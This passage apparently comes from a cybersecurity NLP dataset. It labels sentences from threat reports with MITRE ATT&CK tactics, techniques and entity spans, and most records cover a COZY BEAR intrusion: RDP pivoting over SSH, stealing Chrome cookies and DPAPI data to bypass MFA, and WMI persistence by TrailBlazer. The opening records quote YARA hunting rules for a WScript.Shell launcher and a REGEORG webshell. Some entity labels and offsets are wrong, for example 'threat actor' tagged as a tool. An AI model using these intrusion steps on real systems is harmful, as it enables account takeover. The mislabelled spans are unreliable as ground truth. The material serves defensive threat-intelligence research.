"page_number": 1, "sentence_id": 112, "context_before": "strings:\n$s1 = \"CreateObject(\\\"WScript.", "sentence_text": "Shell\\\")\" ascii $s2 = \"WshShell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s113-c27182", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 113, "context_before": "Shell\\\")\" ascii $s2 = \"WshShell.", "sentence_text": "Run chr(34) &\" ascii $s3 = \"& Chr(34), 0\" ascii $s4 = \"Set WshShell = Nothing\" ascii $s5 = \".bat\" ascii condition:\nfilesize < 400 and all of them } rule M_Hunting_APT_Webshell_PHP_NEOREGEORG { meta:\nauthor = \"Mandiant\" description = \"Searching for REGEORG webshells.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s114-a77b12", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 114, "context_before": "Run chr(34) &\" ascii $s3 = \"& Chr(34), 0\" ascii $s4 = \"Set WshShell = Nothing\" ascii $s5 = \".bat\" ascii condition:\nfilesize < 400 and all of them } rule M_Hunting_APT_Webshell_PHP_NEOREGEORG { meta:\nauthor = \"Mandiant\" description = \"Searching for REGEORG webshells.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s115-f13f24", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 115, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$php = \" acquired during previous credential theft activities.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Referenced credentials acquired through prior credential theft.", "entities": [ { "text": "sftp", "start": 5, "end": 9, "label": "MalwareTool" }, { "text": "credential theft ", "start": 36, "end": 53, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s24-4ebd7e", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "user sftp> acquired during previous credential theft activities.", "sentence_text": "Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "Used SSH port forwarding to establish an RDP session to an internal server using a domain service account.", "entities": [ { "text": "SSH ", "start": 44, "end": 48, "label": "MalwareTool" }, { "text": "Remote Desktop Protocol (RDP)", "start": 91, "end": 120, "label": "MalwareTool" }, { "text": "public-facing system", "start": 55, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "internal server (Server 1)", "start": 135, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "Use port forwarding capabilities built into SSH ", "start": 0, "end": 48, "label": "Action" }, { "text": "stablish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) ", "start": 80, "end": 162, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s25-de6d01", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account.", "sentence_text": "From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator's account.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "Established an RDP session from Server 1 to Server 2 using a domain administrator account", "entities": [ { "text": "RDP session ", "start": 33, "end": 45, "label": "MalwareTool" }, { "text": "internal server (Server 2) ", "start": 60, "end": 87, "label": "Action" }, { "text": "Server 1", "start": 5, "end": 13, "label": "Infrastructure_Indicator" }, { "text": "domain administrator's account", "start": 95, "end": 125, "label": "Action" }, { "text": "establish another RDP session", "start": 15, "end": 44, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s26-a442ea", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator's account.", "sentence_text": "Log in to O365 as a user with privileged access to cloud resources.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Logged into O365 using privileged cloud credentials", "entities": [ { "text": "user ", "start": 20, "end": 25, "label": "ThreatActor" }, { "text": "O365", "start": 10, "end": 14, "label": "Infrastructure_Indicator" }, { "text": "cloud resources", "start": 51, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "Log in to O365 as a user with privileged access to cloud resources", "start": 0, "end": 66, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s27-db365d", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "Log in to O365 as a user with privileged access to cloud resources.", "sentence_text": "This technique could be hard to identify in environments where defenders have little visibility into identity usage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s28-1195a9", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "This technique could be hard to identify in environments where defenders have little visibility into identity usage.", "sentence_text": "However, the threat actor could have easily used a second domain administrator account or any other combination of accounts that would not be easily detected.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078.002", "name": "Domain Accounts" } ], "procedure": "Used additional domain administrator or other accounts to avoid detection.", "entities": [ { "text": "threat actor", "start": 13, "end": 25, "label": "ThreatActor" }, { "text": "second domain administrator account", "start": 51, "end": 86, "label": "MalwareTool" }, { "text": " combination of accounts ", "start": 99, "end": 124, "label": "MalwareTool" }, { "text": "used a second domain administrator account or any other combination of accounts ", "start": 44, "end": 124, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s29-c65d49", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "However, the threat actor could have easily used a second domain administrator account or any other combination of accounts that would not be easily detected.", "sentence_text": "A solution such as would help identify these anomalous logons — and especially infrequent destinations for accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s30-47494a", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "A solution such as would help identify these anomalous logons — and especially infrequent destinations for accounts.", "sentence_text": "(Read how CrowdStrike incident responders leverage the module in investigations in this blog:\nCredentials, Authentications and Hygiene: Supercharging Incident Response with Falcon Identity Threat Detection .)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s31-62a023", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "(Read how CrowdStrike incident responders leverage the module in investigations in this blog:\nCredentials, Authentications and Hygiene: Supercharging Incident Response with Falcon Identity Threat Detection .)", "sentence_text": "But how had the threat actor succeeded in authenticating into victim O365 tenants, when multifactor authentication (MFA) had been enabled for every O365 user account at each victim organization investigated by CrowdStrike?\nCookie Theft to Bypass MFA", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1539", "name": "Steal Web Session Cookie" } ], "procedure": "Stole authentication cookies to bypass MFA", "entities": [ { "text": "Cookie Theft to Bypass MFA", "start": 223, "end": 249, "label": "Action" }, { "text": "threat actor", "start": 16, "end": 28, "label": "ThreatActor" }, { "text": "authenticating into victim O365 tenants", "start": 42, "end": 81, "label": "Action" }, { "text": "victim O365 tenants", "start": 62, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s32-1cb2e6", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "But how had the threat actor succeeded in authenticating into victim O365 tenants, when multifactor authentication (MFA) had been enabled for every O365 user account at each victim organization investigated by CrowdStrike?\nCookie Theft to Bypass MFA", "sentence_text": "The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1021.002", "name": "SMB/Windows Admin Shares" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "The threat actor used administrative accounts to connect via SMB to targeted users and copied Chrome profile directories and DPAPI-protected data to bypass MFA and access victim environments.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "using administrative accounts", "start": 38, "end": 67, "label": "Action" }, { "text": "connect via SMB", "start": 71, "end": 86, "label": "Action" }, { "text": "copy their Chrome profile directories", "start": 115, "end": 152, "label": "Action" }, { "text": "SMB", "start": 83, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "Chrome profile directories", "start": 126, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "data protection API (DPAPI) data", "start": 164, "end": 196, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s33-23bc25", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data.", "sentence_text": "In Windows, Chrome cookies and saved passwords are encrypted using DPAPI.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s34-16d1b9", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "In Windows, Chrome cookies and saved passwords are encrypted using DPAPI.", "sentence_text": "The user-specific encryption keys for DPAPI are stored under C:\\Users\\\\AppData\\Roaming\\Microsoft\\Protect\\ .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s35-896ec9", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "The user-specific encryption keys for DPAPI are stored under C:\\Users\\\\AppData\\Roaming\\Microsoft\\Protect\\ .", "sentence_text": "The cookies were then added to a new session using a “Cookie Editor” Chrome extension that the threat actor installed on victim systems and removed after using.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Web Browsers" }, { "id": "T1176", "name": "Browser Extensions" } ], "procedure": "The threat actor installed a Cookie Editor browser extension on victim systems to inject stolen cookies into a new session and then removed the extension after use.", "entities": [ { "text": "threat actor", "start": 95, "end": 107, "label": "ThreatActor" }, { "text": "installed", "start": 108, "end": 117, "label": "Action" }, { "text": "“Cookie Editor” Chrome extension", "start": 53, "end": 85, "label": "MalwareTool" }, { "text": "added to a new session", "start": 22, "end": 44, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s36-d14228", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "The cookies were then added to a new session using a “Cookie Editor” Chrome extension that the threat actor installed on victim systems and removed after using.", "sentence_text": "This activity was identified via a NewScriptWritten event within Falcon when a JavaScript file was written to disk by a threat actor-initiated Chrome process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s37-bc0bfc", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "This activity was identified via a NewScriptWritten event within Falcon when a JavaScript file was written to disk by a threat actor-initiated Chrome process.", "sentence_text": "This event captured the unique extension ID associated with the extension, thereby allowing CrowdStrike incident responders to validate via the Chrome Store that the JavaScript file was associated with the “Cookie Editor” plugin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s38-16b1e1", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "This event captured the unique extension ID associated with the extension, thereby allowing CrowdStrike incident responders to validate via the Chrome Store that the JavaScript file was associated with the “Cookie Editor” plugin.", "sentence_text": "Shellbags were also instrumental in identifying the cookie theft activity.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Referenced the use of shellbags to identify cookie theft activity.", "entities": [ { "text": "Shellbags", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "cookie theft activity", "start": 52, "end": 73, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s39-f90c7e", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "Shellbags were also instrumental in identifying the cookie theft activity.", "sentence_text": "This artifact very clearly showed the threat actor accessing targeted users’ machines in sequence and browsing to the Chrome and DPAPI directories one after another.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1087", "name": "Account Discovery" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "The threat actor accessed multiple targeted users’ machines in sequence and browsed Chrome and DPAPI directories to collect credential-related artifacts.", "entities": [ { "text": "threat actor", "start": 38, "end": 50, "label": "ThreatActor" }, { "text": "accessing targeted users’ machines", "start": 51, "end": 85, "label": "Action" }, { "text": "Chrome", "start": 118, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "DPAPI directories", "start": 129, "end": 146, "label": "Infrastructure_Indicator" }, { "text": "browsing to the Chrome and DPAPI directories", "start": 102, "end": 146, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s40-82c00b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "This artifact very clearly showed the threat actor accessing targeted users’ machines in sequence and browsing to the Chrome and DPAPI directories one after another.", "sentence_text": "Parsing Shellbags for an administrative account leveraged by the threat actor resulted in entries similar to the below.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078.002", "name": "Domain Accounts" } ], "procedure": "Threat actor leveraged an administrative account, as shown through Shellbag entries", "entities": [ { "text": "threat actor ", "start": 65, "end": 78, "label": "ThreatActor" }, { "text": "Shellbags", "start": 8, "end": 17, "label": "MalwareTool" }, { "text": "administrative account ", "start": 25, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "leveraged by the threat actor", "start": 48, "end": 77, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s41-1f6252", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Parsing Shellbags for an administrative account leveraged by the threat actor resulted in entries similar to the below.", "sentence_text": "O365 Delegated Administrator Abuse By analyzing Azure AD sign-ins, CrowdStrike was able to use known indicators of compromise (IOCs) to identify several threat actor logins to customer environments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Threat actor logged into customer environments through O365 delegated administrator abuse.", "entities": [ { "text": "threat actor", "start": 153, "end": 165, "label": "MalwareTool" }, { "text": "indicators of compromise (IOCs) ", "start": 101, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "Azure AD sign-ins", "start": 48, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "customer environments", "start": 176, "end": 197, "label": "Infrastructure_Indicator" }, { "text": " identify several threat actor logins to customer environments", "start": 135, "end": 197, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s42-921b8e", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "O365 Delegated Administrator Abuse By analyzing Azure AD sign-ins, CrowdStrike was able to use known indicators of compromise (IOCs) to identify several threat actor logins to customer environments.", "sentence_text": "These cross-tenant sign-ins were identified by looking for values in the resourceTenantId attribute that did not match the Cloud Solution Partner’s own Azure tenant ID.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.007", "name": "Cloud Services" } ], "procedure": "Identified adversary cross-tenant sign-ins by checking mismatched resourceTenantId values.", "entities": [ { "text": " cross-tenant sign-ins", "start": 5, "end": 27, "label": "MalwareTool" }, { "text": "resourceTenantId ", "start": 73, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "Cloud Solution Partner’s own Azure tenant ID", "start": 123, "end": 167, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s43-ccdaee", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "These cross-tenant sign-ins were identified by looking for values in the resourceTenantId attribute that did not match the Cloud Solution Partner’s own Azure tenant ID.", "sentence_text": "This limitation is scheduled to be resolved in 2022 via Microsoft’s scheduled feature, Granular Delegated Admin Privileges (GDAP).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s44-49d6be", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "This limitation is scheduled to be resolved in 2022 via Microsoft’s scheduled feature, Granular Delegated Admin Privileges (GDAP).", "sentence_text": "User Access Logging (UAL)\nThe Windows User Access Logging (UAL) database is an extremely powerful artifact that has played an instrumental role in the investigation of StellarParticle-linked cases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s45-307780", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "User Access Logging (UAL)\nThe Windows User Access Logging (UAL) database is an extremely powerful artifact that has played an instrumental role in the investigation of StellarParticle-linked cases.", "sentence_text": "In particular, UAL has helped our responders identify earlier malicious account usage that ultimately led to the identification of the aforementioned TrailBlazer implant and Linux version of the GoldMax variant.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Identified earlier malicious account usage that revealed TrailBlazer and GoldMax", "entities": [ { "text": "UAL", "start": 15, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "TrailBlazer implant ", "start": 150, "end": 170, "label": "MalwareTool" }, { "text": "Linux version of the GoldMax variant", "start": 174, "end": 210, "label": "MalwareTool" }, { "text": "malicious account usage ", "start": 62, "end": 86, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s46-d1e3e7", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "In particular, UAL has helped our responders identify earlier malicious account usage that ultimately led to the identification of the aforementioned TrailBlazer implant and Linux version of the GoldMax variant.", "sentence_text": "The UAL database is available by default on Server editions of Windows starting with Server 2012.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s47-8f4ff6", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "The UAL database is available by default on Server editions of Windows starting with Server 2012.", "sentence_text": "This database stores historical information on user access to various services (or in Windows parlance, Roles) on the server for up to three years (three years minus one day) by default.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s48-f86f79", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "This database stores historical information on user access to various services (or in Windows parlance, Roles) on the server for up to three years (three years minus one day) by default.", "sentence_text": "UAL contains information on the type of service accessed, the user that accessed the service and the source IP address from which the access occurred.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s49-1c8665", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "UAL contains information on the type of service accessed, the user that accessed the service and the source IP address from which the access occurred.", "sentence_text": "Even though it’s only available on Server 2012 and up, UAL can still be used to trace evidence of threat actor activity on legacy systems as long as the activity on the legacy system involves some (deliberate or unintentional) access to a 2012+ system.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "UAL can trace threat actor activity on legacy systems when they access a 2012+ system", "entities": [ { "text": "threat actor ", "start": 98, "end": 111, "label": "ThreatActor" }, { "text": "Server 2012 and up", "start": 35, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "legacy system", "start": 169, "end": 182, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s50-66b63e", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "Even though it’s only available on Server 2012 and up, UAL can still be used to trace evidence of threat actor activity on legacy systems as long as the activity on the legacy system involves some (deliberate or unintentional) access to a 2012+ system.", "sentence_text": "This allowed CrowdStrike to demonstrate that a given user account was also authenticating to Active Directory from a given source IP address two years prior.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Identified historical authentication of a user account to Active Directory from a specific source IP", "entities": [ { "text": "Active Directory ", "start": 93, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "source IP address ", "start": 123, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "user account ", "start": 53, "end": 66, "label": "MalwareTool" }, { "text": "authenticating to Active Directory", "start": 75, "end": 109, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s51-ea1a46", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "This allowed CrowdStrike to demonstrate that a given user account was also authenticating to Active Directory from a given source IP address two years prior.", "sentence_text": "Because the user account was known to have recently been abused by the threat actor, and the source IP of the system in question was not one that account would typically be active on, the investigation led to the source system and ultimately resulted in the timeline of malicious activity being pushed back by years, with additional compromised systems even being discovered still running unique malware from that time period.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Threat actor abused a user account and activity was traced to a suspicious source IP, revealing earlier malicious activity and additional compromised systems running unique malware", "entities": [ { "text": "threat actor", "start": 71, "end": 83, "label": "MalwareTool" }, { "text": "unique malware", "start": 389, "end": 403, "label": "Infrastructure_Indicator" }, { "text": "user account ", "start": 12, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "source IP", "start": 93, "end": 102, "label": "Action" }, { "text": "additional compromised systems", "start": 322, "end": 352, "label": "Action" }, { "text": "abused by the threat actor", "start": 57, "end": 83, "label": "Action" }, { "text": "malicious activity ", "start": 270, "end": 289, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s52-ccf913", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "Because the user account was known to have recently been abused by the threat actor, and the source IP of the system in question was not one that account would typically be active on, the investigation led to the source system and ultimately resulted in the timeline of malicious activity being pushed back by years, with additional compromised systems even being discovered still running unique malware from that time period.", "sentence_text": "TrailBlazer\nand\nGoldMax\nThroughout StellarParticle-related investigations, CrowdStrike has identified two sophisticated malware families that were placed on victim systems in the mid-2019 timeframe: a Linux variant of GoldMax and a completely new family CrowdStrike refers to as TrailBlazer TrailBlazer Attempted to blend in with a file name that matched the system name it resided on Configured for WMI persistence (generally uncommon in 2019)", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1546.003", "name": "Windows Management Instrumentation Event Subscription" } ], "procedure": "TrailBlazer used WMI for persistence", "entities": [ { "text": "Linux variant of GoldMax", "start": 201, "end": 225, "label": "MalwareTool" }, { "text": "TrailBlazer", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "victim systems ", "start": 157, "end": 172, "label": "Infrastructure_Indicator" }, { "text": "Attempted to blend in", "start": 303, "end": 324, "label": "Action" }, { "text": "Configured for WMI persistence", "start": 385, "end": 415, "label": "MalwareTool" }, { "text": "placed on victim systems ", "start": 147, "end": 172, "label": "Action" }, { "text": " with a file name that matched the system name it resided on", "start": 324, "end": 384, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s53-4f71c6", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "TrailBlazer\nand\nGoldMax\nThroughout StellarParticle-related investigations, CrowdStrike has identified two sophisticated malware families that were placed on victim systems in the mid-2019 timeframe: a Linux variant of GoldMax and a completely new family CrowdStrike refers to as TrailBlazer TrailBlazer Attempted to blend in with a file name that matched the system name it resided on Configured for WMI persistence (generally uncommon in 2019)", "sentence_text": "Used likely compromised infrastructure for C2 Masquerades its command-and-control (C2) traffic as legitimate Google Notifications HTTP requests TrailBlazer is a sophisticated malware family that provides modular functionality and a very low prevalence.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "used compromised infrastructure and masqueraded C2 traffic as google notifications", "entities": [ { "text": "TrailBlazer ", "start": 144, "end": 156, "label": "MalwareTool" }, { "text": " compromised infrastructure for C2 ", "start": 11, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "Masquerades its command-and-control (C2) traffic as legitimate Google Notifications HTTP requests", "start": 46, "end": 143, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s54-a6718d", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "Used likely compromised infrastructure for C2 Masquerades its command-and-control (C2) traffic as legitimate Google Notifications HTTP requests TrailBlazer is a sophisticated malware family that provides modular functionality and a very low prevalence.", "sentence_text": "The malware shares high-level functionality with other malware families.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s55-337922", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "The malware shares high-level functionality with other malware families.", "sentence_text": "In particular, the use of random identifier strings for C2 operations and result codes, and attempts to hide C2 communications in seemingly legitimate web traffic, were previously observed tactics, techniques and procedures (TTPs) in GoldMax and SUNBURST.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1001.001", "name": "Junk Data" } ], "procedure": "Used random identifiers for C2 operations and hid C2 communications inside legitimate-looking web traffic", "entities": [ { "text": "GoldMax ", "start": 234, "end": 242, "label": "MalwareTool" }, { "text": "SUNBURST", "start": 246, "end": 254, "label": "MalwareTool" }, { "text": "random identifier strings", "start": 26, "end": 51, "label": "MalwareTool" }, { "text": "C2 operations", "start": 56, "end": 69, "label": "Infrastructure_Indicator" }, { "text": " legitimate web traffic", "start": 139, "end": 162, "label": "Infrastructure_Indicator" }, { "text": "use of random identifier strings for C2 operations and result codes,", "start": 19, "end": 87, "label": "Action" }, { "text": "hide C2 communications in seemingly legitimate web traffic", "start": 104, "end": 162, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s56-c7503c", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "In particular, the use of random identifier strings for C2 operations and result codes, and attempts to hide C2 communications in seemingly legitimate web traffic, were previously observed tactics, techniques and procedures (TTPs) in GoldMax and SUNBURST.", "sentence_text": "TrailBlazer\npersists on a compromised host using WMI event subscriptions — a technique also used by SeaDuke — although this persistence mechanism is not exclusive to COZY BEAR.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1546.003", "name": "Windows Management Instrumentation Event Subscription" } ], "procedure": "TrailBlazer persisted using WMI event subscriptions", "entities": [ { "text": "COZY BEAR", "start": 166, "end": 175, "label": "ThreatActor" }, { "text": "TrailBlazer", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "SeaDuke ", "start": 100, "end": 108, "label": "ThreatActor" }, { "text": " compromised host ", "start": 25, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "persists on a compromised host using WMI event subscriptions", "start": 12, "end": 72, "label": "MalwareTool" }, { "text": "WMI event subscriptions", "start": 49, "end": 72, "label": "MalwareTool" } ] }, { "uid": "mitre-84_mitre_report-p1-s57-8d9b45", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "TrailBlazer\npersists on a compromised host using WMI event subscriptions — a technique also used by SeaDuke — although this persistence mechanism is not exclusive to COZY BEAR.", "sentence_text": "TrailBlazer\nWMI Persistence\nIn the obfuscated example above, TrailBlazer ( .exe ) would be executed when the system's uptime was between 180 and 480 seconds.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1546.003", "name": "Windows Management Instrumentation Event Subscription" } ], "procedure": "TrailBlazer was configured to execute based on system uptime between 180–480 seconds", "entities": [ { "text": "TrailBlazer", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": " .exe ", "start": 75, "end": 91, "label": "MalwareTool" }, { "text": "executed when the system's uptime was between 180 and 480 seconds", "start": 102, "end": 167, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s58-1b6057", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "TrailBlazer\nWMI Persistence\nIn the obfuscated example above, 